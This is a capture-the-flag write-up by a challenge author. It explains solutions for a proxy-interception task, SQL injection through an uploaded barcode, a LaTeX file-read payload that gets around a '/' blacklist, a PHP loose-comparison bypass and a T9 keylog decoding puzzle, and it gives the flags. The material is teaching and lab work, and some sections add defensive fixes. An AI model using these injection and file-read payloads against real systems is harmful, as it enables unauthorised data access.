Introduction

I was an organiser for this CTF so the following write-ups are for challenges that I developed. The full repository with all of the challenges can be found here.


Man-in-the-Mirror

Category: Networks
Author: James Lowther (Articuler)

Description

And no message could have been any clearer…

Hints

  1. Where is the data getting filtered?

Solution

This challenge provides a website and a proxy. Going to the website without going through the proxy will return an error stating that you can’t get the flag this way. Connecting to the website through the proxy will indicate that the flag was returned, but was filtered out by the proxy before getting sent to you.

  1. To solve this challenge, we need to intercept the response from the website that was requested by the proxy before it is sent back to the proxy and filtered out. Somehow we need to see the response before the proxy obfuscates it, while still using the auth key generated by the proxy.
  2. To do this, write your own intercept proxy in a language like Python 3 which forwards all requests to the website and prints out the returned HTML.
  3. Next, send a request to your intercept proxy using the given proxy. By forwarding the proxy’s request through the intercept proxy you will be able to look at the returned HTML while still using the proxy’s authentication credentials. The flag will be in the body of this response.

Request normally

+----------+   Request   +-----------+   Auth Key   +-------------+
|          | ----------> |           | -----------> |             |
|   HOST   |             |   PROXY   |              |   WEBSITE   |
|          | <---------- |           | <----------- |             |
+----------+  Obfuscated +-----------+     Flag     +-------------+
                 Flag

Request with intercept proxy

+----------+   Request   +-----------+  Auth Key   +---------------+  Auth Key   +-------------+
|          | ----------> |           | ----------> |               | ----------> |             |
|   HOST   |             |   PROXY   |             |   INTERCEPT   |             |   WEBSITE   |
|          |             |           |             |     PROXY     | <---------- |             |
+----------+             +-----------+             +---------------+    Flag     +-------------+
                                                          |
                                                          |
                                                          |
                                                          v
                                                         Flag
                                                       Retrieved

Here is an example of the intercept proxy:

import sys, socket

def main():

  if len(sys.argv) < 4:
    print(f"Usage: {sys.argv[0]} <intercept_port> <challenge_host> <challenge_port>")
    sys.exit(1)

  my_port = int(sys.argv[1])
  challenge_site = sys.argv[2]
  challenge_port = int(sys.argv[3])

  # Listen for the connection that the challenge proxy will make to us
  serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  serversocket.bind(('0.0.0.0', my_port))
  serversocket.listen(5)

  while True:
    print(f"Waiting for connection on port {my_port}...")
    (clientsocket, address) = serversocket.accept()

    # The proxy's request already carries the auth key it generated
    print("Client connected. Waiting to receive data...")
    msg_byte = clientsocket.recv(4096)

    print(f"Connecting to {challenge_site} on port {challenge_port}...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    s.connect((challenge_site, challenge_port))

    print("Sending request from proxy...")
    s.sendall(msg_byte)

    # Keep reading until the website closes the connection (or goes quiet),
    # so a response longer than a single recv() is not truncated
    print("Waiting to receive data...")
    data = b""
    try:
      while True:
        chunk = s.recv(4096)
        if not chunk:
          break
        data = data + chunk
    except socket.timeout:
      pass
    print("\n" + data.decode(errors="replace") + "\n")

    print("Closing connection...")
    clientsocket.close()
    s.close()

main()

Flag

magpie{1m_st4rt1ng_w1th_th3_m4n_1n_th3_m1ddl3}


Birdbuster Video

Category: Web Exploitation
Author: James Lowther (Articuler)

Description

Weren’t video rental stores the best?! See if you can break into this one!

Hints

  1. 80s action movies really inject you full of adrenaline!

Solution

This challenge provides you with a website that lets you upload a barcode. The website will “scan” this barcode and will return information about the movie title that was encoded.

  1. To solve this challenge, generate a barcode with a SQL injection that returns all rows using an online barcode generator.
    • For example, ' OR 1=1; --
  2. Upload the barcode to the website.
  3. The flag can be found at the bottom of the returned results.
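The injection works because the text decoded from the barcode is spliced straight into a SQL string, so the scanner output is executed as a query. The following is an added example, not code from the challenge or the original write-up: it builds a constructed in-memory SQLite catalogue (the real table layout is not shown here, so the column names are assumptions), runs the write-up's ' OR 1=1; -- payload against a lookup that concatenates the barcode, and then against a parameterised lookup with an added barcode-format check.

```python
import re
import sqlite3

# Constructed sample catalogue standing in for the challenge's movie table; the
# real schema is not on the page, so the column names here are assumptions.
MOVIES = [
    ("036000291452", "Commando", 1985),
    ("036000291469", "Predator", 1987),
    ("036000291476", "Die Hard", 1988),
    ("000000000000", "constructed-flag-row", 0),  # row a normal lookup should never return
]
PAYLOAD = "' OR 1=1; --"   # the injection from the write-up, as decoded barcode text


def make_db():
    """In-memory SQLite database loaded with the constructed catalogue."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE movies (barcode TEXT, title TEXT, year INTEGER)")
    conn.executemany("INSERT INTO movies VALUES (?, ?, ?)", MOVIES)
    return conn


def lookup_vulnerable(conn, scanned):
    """Decoded barcode text is spliced into the SQL string: scanner output becomes code."""
    sql = f"SELECT title FROM movies WHERE barcode = '{scanned}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterised(conn, scanned):
    """Same query with a bound parameter: the value is data and is never parsed as SQL."""
    rows = conn.execute("SELECT title FROM movies WHERE barcode = ?", (scanned,))
    return [row[0] for row in rows]


def is_valid_barcode(scanned):
    """Defence in depth: EAN-8, UPC-A and EAN-13 payloads are 8, 12 or 13 digits, nothing else."""
    return re.fullmatch(r"\d{8}|\d{12}|\d{13}", scanned) is not None


def lookup_hardened(conn, scanned):
    """Reject anything that is not a barcode, then query with a bound parameter."""
    if not is_valid_barcode(scanned):
        return []
    return lookup_parameterised(conn, scanned)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, legitimate barcode:", lookup_vulnerable(db, "036000291452"))
    print("vulnerable, payload           :", lookup_vulnerable(db, PAYLOAD))
    print("parameterised, payload        :", lookup_parameterised(db, PAYLOAD))
    print("hardened, payload             :", lookup_hardened(db, PAYLOAD))
```

The vulnerable lookup returns every row for the payload, the flag row included; the parameterised lookup returns nothing because the whole payload is matched as a literal barcode value. The format check is an extra layer: even if a future query is written carelessly, a decoded symbol that is not purely numeric never reaches the database.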

Flag

magpie{80s_m0v135_4r3_th3_b35t}


Richard Simmons: Sweatin’ in LaTeX

Category: Web Exploitation
Author: James Lowther (Articuler)

Description

Richard Simmons’ new workout “Sweatin’ in LaTeX” is out now! See if you can shimmy your way to the flag!

Solution

The website appears to be a renderer for LaTeX code. Writing LaTeX and clicking “Generate PDF” gives a link to a rendered PDF. The output LOG of the LaTeX renderer will also be displayed.

  1. Looking at the source HTML indicates that we need to read the flag from a file found in /sweatin/to/the/oldies/flag.txt.
  2. LaTeX is Turing-complete and has the ability to read files; however, certain strings have been blacklisted. Most notably, / has been blacklisted, making it challenging to create the path to read the file.
  3. The / character however can be isolated from index.html using the \StrMid function from the xstring package. By getting the / character from index.html, we can use it to build our path and bypass the blacklisted characters filter.
  4. Using this we can write the following LaTeX code that will build the path and read the flag:
\documentclass{minimal}
 
% The xstring package allows us to use \StrMid
\usepackage{xstring}
 
% Define sections of the path to the flag
\def\a{sweatin}
\def\b{to}
\def\c{the}
\def\d{oldies}
\def\e{flag.txt}
 
% Read index.html and isolate the forward-slash character into \s
\newread\file
\immediate\openin\file=index.html
\immediate\read\file to\fileline
\immediate\read\file to\fileline
\immediate\read\file to\fileline
\immediate\read\file to\fileline
\StrMid{\fileline}{43}{43}[\s]
\immediate\closein\file
 
% Build the path to the flag and read it
\immediate\openin\file=\s\a\s\b\s\c\s\d\s\e
\loop\unless\ifeof\file
    \read\file to\fileline
    \message{\fileline}
\repeat
\closein\file
 
\begin{document}
\end{document}

The flag can be found in the returned LOG data.

Flag

magpie{r1ch4rd_l0v35_t0_5w34t}


The Smurfs Cipher

Category: Web Exploitation
Author: James Lowther (Articuler)

Description

Gargamel stole the key to decrypt The Smurfs ciphertext. Now they can’t get into their kingdom to view their flag. Can you help them get the right key?

Solution

This challenge gives you a file named cipher and the source code used to return the flag. Your goal is to reverse engineer the source code to create and upload the key that will allow the flag to be returned. This challenge requires you to exploit PHP loose comparison. In PHP versions less than 8, using == will loosely compare variables of different types, allowing expressions to implicitly evaluate to true. Any string (e.g. password.txt) compared with the integer 0 will evaluate to true. By making $to_check equal to 0 we can echo the flag.

A table showing all of the PHP loose comparison values can be found here.

  1. In order to get the flag we need to ensure that $to_check is 0 to exploit PHP using loose comparison.
  2. Create an 8-byte file that is equivalent to the data in cipher + 0xd34db33f and upload it.
    • Your key will be XORed with cipher + 0xd34db33f. If they are equivalent then the XOR result will be zero.
  3. The if statement will be 0 == "whatever the password is" which evaluates to true, and the flag will be echoed back.
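The three steps above, as an added example that is not the challenge's source or the original write-up's code. The script models PHP's int-to-string == comparison for both the pre-8 and the 8+ rules, derives the key whose XOR with cipher + 0xd34db33f is zero, and shows that the same key opens the gate under PHP 7 semantics but not under PHP 8. The cipher bytes and the password string are constructed stand-ins, and the way the 8-byte file is turned into an integer for the addition (big-endian, wrapping modulo 2**64) is an assumption, since the page does not show that part of the source.

```python
import re

# PHP 8 numeric-string grammar: optional surrounding whitespace, sign, digits, exponent.
_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")
# PHP 5/7 also accepted a numeric *prefix* ("42abc" -> 42) and mapped anything else to 0.
_LEADING = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?")

CONST = 0xD34DB33F
# Constructed 8-byte stand-in for the challenge's cipher file (real contents not on the page).
SAMPLE_CIPHER = bytes.fromhex("0011223344556677")
# Constructed stand-in for whatever the real password string is.
SAMPLE_PASSWORD = "constructed-password.txt"


def php_int_eq_string(number, s, php_major=7):
    """Model of PHP's `$number == $s` with an int on the left and a string on the right."""
    if php_major >= 8:
        if _NUMERIC.match(s):
            return float(number) == float(s)
        return str(number) == s            # non-numeric string: the int is cast to a string
    m = _LEADING.match(s)                  # PHP 5/7: the string is always cast to a number
    return float(number) == (float(m.group(0)) if m else 0.0)


def target(cipher):
    """cipher + 0xd34db33f as the write-up describes it.
    Assumption: the 8 bytes form one big-endian unsigned integer, addition wraps mod 2**64."""
    return (int.from_bytes(cipher, "big") + CONST) % 2**64


def derive_key(cipher):
    """The 8-byte key whose XOR with the target is exactly zero (step 2)."""
    return target(cipher).to_bytes(8, "big")


def to_check(cipher, key):
    """The value the challenge compares against the password (step 1)."""
    return int.from_bytes(key, "big") ^ target(cipher)


def flag_released(cipher, key, password=SAMPLE_PASSWORD, php_major=7):
    """`$to_check == $password` as evaluated by the given PHP major version (step 3)."""
    return php_int_eq_string(to_check(cipher, key), password, php_major)


if __name__ == "__main__":
    key = derive_key(SAMPLE_CIPHER)
    print("to_check            :", to_check(SAMPLE_CIPHER, key))
    print("PHP 7 releases flag :", flag_released(SAMPLE_CIPHER, key, php_major=7))
    print("PHP 8 releases flag :", flag_released(SAMPLE_CIPHER, key, php_major=8))
```

The PHP 8 branch is the reason the trick stopped working: a non-numeric string is no longer coerced to 0, so 0 == "password" is false. On any version, the fix for the gate itself is a strict comparison (===), or hash_equals() when the value being compared is a secret, because both check the type as well as the value.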

Flag

magpie{l0053_c0mp4r150n_l34d5_t0_tr0ub13}


DynaTAC 8000x Keylogger

Category: Forensics
Author: James Lowther (Articuler)

Description

The DynaTAC 8000X, released in 1983, was the first consumer cellphone ever sold. Somebody recently modified it to support texting and added a keylogger! Can you find out what message was sent? Note: wrap extracted data in magpie{}

Hints

  1. Take a look at 9-key texting on flip phones.
  2. Pay attention to when the keys were actually pressed.

Solution

This challenge provides you with a file including a bunch of keystrokes on a cell phone as well as the time the key was pressed. Keys need to be decoded to the letters that would be selected if pressed on a 9-key flip phone. The time between each sequence of presses is roughly 400ms and the time between each letter is roughly 1200ms. The BACKSPACE key represents an incorrect sequence and the user deleting a previously entered letter.

  1. To solve this challenge, write a script that looks at the keys and the time they were pressed and decodes each sequence of key presses back to the corresponding letter on a 9-key flip phone.

Here is an example script to decode the sequence:

filename = "keylog.txt"

# Thresholds in ms: presses closer together than tap_time belong to the same
# letter; a longer gap (roughly hold_time in the challenge data) ends the letter
tap_time = 450
hold_time = 1300

t9_dict = {
    "2" : "a",
    "22" : "b",
    "222" : "c",
    "3" : "d",
    "33" : "e",
    "333" : "f",
    "4" : "g",
    "44" : "h",
    "444" : "i",
    "5" : "j",
    "55" : "k",
    "555" : "l",
    "6" : "m",
    "66" : "n",
    "666" : "o",
    "7" : "p",
    "77" : "q",
    "777" : "r",
    "7777" : "s",
    "8" : "t",
    "88" : "u",
    "888" : "v",
    "9" : "w",
    "99" : "x",
    "999" : "y",
    "9999" : "z"
}

def main():
    # Read in the challenge data, skipping the 5 header lines
    with open(filename, "r") as in_file:
        data = in_file.readlines()[5:]

    c_time = 0
    seq = ""
    flag = ""

    for line in data:
        x = line.rstrip("\n")
        (time, key) = x.split(" : ")

        # Calculate change in time since the previous press
        delta_time = int(time) - c_time

        # Intermediate key press: same letter, keep cycling through it
        if delta_time < tap_time:
            seq = seq + key

        # Letter selected: commit the previous sequence and start a new one
        else:
            if seq:
                flag = flag + t9_dict[seq]

            # BACKSPACE means the letter just committed was a mistake
            if key == "BACKSPACE":
                flag = flag[:-1]
                seq = ""

            else:
                seq = key

        c_time = int(time)

    # Commit the final sequence, which no later press would otherwise flush
    if seq:
        flag = flag + t9_dict[seq]

    print(flag)

main()

Flag

magpie{itstoobadtextingwasnotevenathingbackthen}